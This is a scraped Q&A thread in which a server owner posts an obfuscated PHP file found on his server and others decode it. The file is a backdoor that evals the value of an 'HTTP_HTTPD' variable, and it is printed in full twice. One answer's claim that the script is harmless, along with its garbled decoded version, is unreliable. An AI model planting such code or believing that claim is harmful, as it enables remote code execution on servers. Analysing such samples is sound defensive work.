eval


Suspicious file found on server


I have found a suspicious file on my server, I am attempting to decode and figure out what it was put there to do.
The code is as follows, any tips on how to decode this.
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);} ?>
Thanks,
Alan.
The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
gives "mystr1s110"
Also part of the string in the eval statement base64_decodes to:
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110
This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.
On a side note. You pulled this off the server, right?
EDIT:
Was kind of intrigued by this. After a complete decode I got this:
<?php
if(!function_exists("myFunction2")){
class myClass {
static $myVar1="SFRUUF9IVFRQRA==";
static $myVar2=“base64_decode”;
}
function myFunction1($myArg)
{
${$myVar4}=myClass::$myVar2; // myClass::$myVar2 is just "base64_decode"
return $myVar4( myClass::${$myArg} ); // reuturning base64_decode of the argument
}
function myFunction2($myArg2)
{
return myClass::${$myVar3}
}
$myFinalVar=#getenv(myFunction1('myVar1')); //just gets env variable of base64 decode of myVar1
if($myFinalVar) {
#eval($myFinalVar); //executes
}
?>
Looks to me like its a script designed to execute a script on another server. (i.e. they could just hit the web address with their script in url and it would execute. SFRUUF9IVFRQRA== decodes to HTTP_HTTPD so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.
According to me, it is not a harmful script, in fact, it is not of any use.
Here is the basis for my comments -
To decode, you can simply put the hex strings as argument to print_r().
print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");
Complete decoded code is:
<?php
if(!function_exists("mystr1s45")){
class mystr1s21 {
static $mystr1s279="SFRUUF9IVFRQRA==";
static $mystr1s178="base64_decode";
}
eval(
eval(
function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
${mystr1s110}=mystr1s21::${mystr1s178};
return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
}
);
eval(
function mystr1s45($mystr1s66) {
return mystr1s21::${${mystr1s66}};
}
);
);
}
$mystr1s2235=#getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
#eval($mystr1s2235);
}
?>
The function mystr1s78 will return 'HTTP_HTTPD'. This will used as environment variable to get its value using getenv.
If you run the decoded code, you will face 'Parsing Error' near definition of function mystr1s78. This is because, eval expects a string and string must be a valid code statement(not expression).
Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('
As far as I know, by default, HTTP_HTTPD is not an environment variable which is set by apache or any webserver and even if it is a variable with some value, passing it to eval will not do anything.
To confirm, you can set an environment variable HTTP_HTTPD as follows:
<?php
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);}
?>
Please let us know if you think this is malicious and can harm the system.

Related Links

uglifyjs does not mangle variables if eval ist present
Whats wrong with iMacros EVAL statement?
python's eval() in Amazon-Redshift: evaluating strings as expressions
Difference between `eval` and `eval-syntax`
How to execute code from a string variable in Crystal?
eval in function scope (accessing function args)
Dynamically created layer names, problems with eval()
Execute JScript code stored as a string and pass arguments
ZSH alias definition and expansion within eval string
Explanation of eval attribute in product.template in OpenErp
Why does unused file fields are having blank value?
Eval() in chrome packaged app
eval(): can't assign to function call
Eval on Processing.js
Use of TRUE:FALSE in eval javascript returns the statement being evaluated
Suspicious file found on server

Categories

HOME
caching
ember.js
cil
sass
reverse-engineering
laravel-5.2
concourse
wampserver
terrain
algorithmic-trading
shader
onenote-api
outlook-web-addins
xul
informatica-powercenter
apache-karaf
statusbar
sensu
ghost-inspector
rworldmap
qsub
http-method
csh
tfs2013
activepython
owl-api
solidworks
hibernate-cache
spring-profiles
body-parser
office365connectors
strstr
visualstudio.testtools
bayesian-networks
control-flow-graph
paho
crop
worker
asmx
filepath
web-deployment-project
istorage
goquery
udev
tcserver
gce
castle-dynamicproxy
addin-express
onresume
sqldatareader
payu
c64
scalar
amf
dbscan
logcat
asp.net-mvc-partialview
usb-drive
asynccallback
qt-linguist
axes
asp.net-mvc-2
altbeacon
web-essentials
jenkins-scriptler
fabric-twitter
mogrify
vine
on-duplicate-key
pylearn
android-search
pisa
sysctl
code-testing
pic24
baucis
bfd
sslexception
stagefright
shiva3d
icsharpcode
transitive-closure-table
datarepeater
plone-funnelweb
redirectstandardoutput
getstring
supersized
selectonemenu
webkit-transform
curljs
cookieless
smooth
hadoop-plugins
quick-search
trampolines
castle-validators
project-lifecycle
interface-design
self-reference

Resources

Mobile Apps Dev
Database Users
javascript
java
csharp
php
android
MS Developer
developer works
python
ios
c
html
jquery
RDBMS discuss
Cloud Virtualization
Database Dev&Adm
javascript
java
csharp
php
python
android
jquery
ruby
ios
html
Mobile App
Mobile App
Mobile App